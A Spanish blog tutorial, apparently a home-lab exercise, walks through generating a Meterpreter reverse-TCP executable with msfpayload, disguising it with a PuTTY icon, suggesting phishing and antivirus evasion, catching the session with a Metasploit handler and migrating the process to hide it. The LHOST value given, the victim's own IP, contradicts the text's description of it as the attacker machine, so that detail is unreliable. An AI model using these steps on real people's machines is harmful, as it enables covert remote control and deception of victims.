Pages

Ads 468x60px

lunes, 4 de mayo de 2015

Hacking desde 0. Hoy atacando un objetivo. Parte I




Bueno, viendo el dibujo de arriba, seguro que ya todos sabéis de lo que vamos a hablar. 

Según la wikipedia, Metasploit es un proyecto open source de seguridad informática que proporciona información acerca de vulnerabilidades de seguridad y ayuda en tests de penetración "Pentesting" y el desarrollo de firmas para sistemas de detección de intrusos.
Si queréis leer sobre Metasploit os recomiendo revisar este link

Comenzamos utilizando una maquina con Windows 7 y otra con BackBox. 



  • La máquina Windows tiene la IP 192.168.1.35.
  • La máquina BackBox tiene la IP 192.168.1.40.
Lo primero que vamos a hacer es general el payload (el .exe) que enviaremos a la victima (Windows 7).




Vamos a analizar lo que hemos escrito.


msfpayload es la herramienta que usamos para generar el payload.


windows/meterpreter/reverse_tcp es el modulo que vamos a utilizar.

LHOST=192.168.1.35 es la IP de la maquina local, Local Host.

LPORT=1335 es el puerto local de la maquina, Local Port.

X se utiliza para hacer ejecutable el archivo.

> patata.exe le indicamos el nombre del archivo que va a crear. 

Una vez que termina, si hacemos un ls podemos ver el archivo creado. Este será el que mandemos a la victima.






Hay muchas formas de engañar al objetivo para que ejecute el archivo. Obviamente el antivirus lo va a detener, pero una vez más podemos hacer que esto no ocurra utilizando Veil-Evasion. En este caso no vamos a utilizarlo para no extender la entrada demasiado. Quizá haga otra entrada para Veil-Evasion...


Para avanzar de manera más rápida voy a pasar directamente el ejecutable a la máquina victima, pero ya os digo que hay muchas formas de realizar esto, con ingeniería social, mediante phishing etc.

El archivo que nos devuelve es un .exe, que como es lógico da mucho el cante, pero vamos a hacer una cosa muy básica y que podría dar resultado al enviarlo al objetivo.





Simplemente cambiando el icono del archivo ya podríamos engañar a la victima y, a pesar de que en su equipo tenga desmarcada la opción de "ocultar las extensiones de archivo para tipos de archivos conocidos" daría igual porque putty tambien es un .exe.

Una vez que lo hemos movido a la máquina destino vamos a seguir. Es el momento de abrir metasploit, para ello, en el equipo con BackBox escribimos en la terminal msfconsole.





El paso siguiente será decirle a Mestasploit que exploit y payload vamos a usar. Para ello escribimos:




Con eso le estamos diciendo que use el exploit handler y después establecemos el payload reverse_tcp.

De la misma forma, establecemos el LHOST y LPORT.



Y por ultimo escribimos exploit para que se ejecute.


Ahora mismo está a la espera de que la victima ejecute el .exe. Si vamos al equipo con Windows y lo ejecutamos veremos lo siguiente.



Y en el equipo con BackBox veremos esto.





Como podemos observar en la imagen, hemos conseguido una sesión de meterpreter, pero viendo la imagen de la máquina atacada, nos damos cuenta de que un proceso con el nombre de patata.exe llama demasiado la atención. Para solucionarlo vamos a migrar el proceso y a inyectarlo en otro que sea del usuario. Usaremos el comando ps para listar los procesos y migrate para cambiar al nuevo proceso.





De esta manera si volvemos a ejecutar 
el comando ps veremos que el proceso patata.exe ha desaparecido.




Bien, ahora podríamos abrir un cmd en la máquina objetivo y trabajar como si estuviésemos en ella.


 Por ejemplo crearnos una carpeta en el escritorio.




Este es un pequeño ejemplo de lo que podríamos hacer una vez que tenemos la sesión de meterpreter.


Si queréis indagar un poco más, basta con que tecleéis el comando help para saber los comandos que podéis utilizar.


-No está la lista completa-

Por el momento vamos a dejarlo aquí. El próximo día veremos como hacernos system y cambiar la clave de administrador (o de cualquier usuario).

Espero que os guste. Y recordad que esto es con fines educativos, no la liéis.

Roberto García (@1GbDeInfo)
Creative Commons Licence
1Gb De informacion by Roberto García Amoriz is licensed under a Creative Commons Attribution-NonCommercial 3.0 Unported License.
Based on a work at http://www.1gbdeinformacion.com/.
Permissions beyond the scope of this license may be available at http://www.1gbdeinformacion.com/.

Perfil profesional en Linkedin

 
Blogger Templates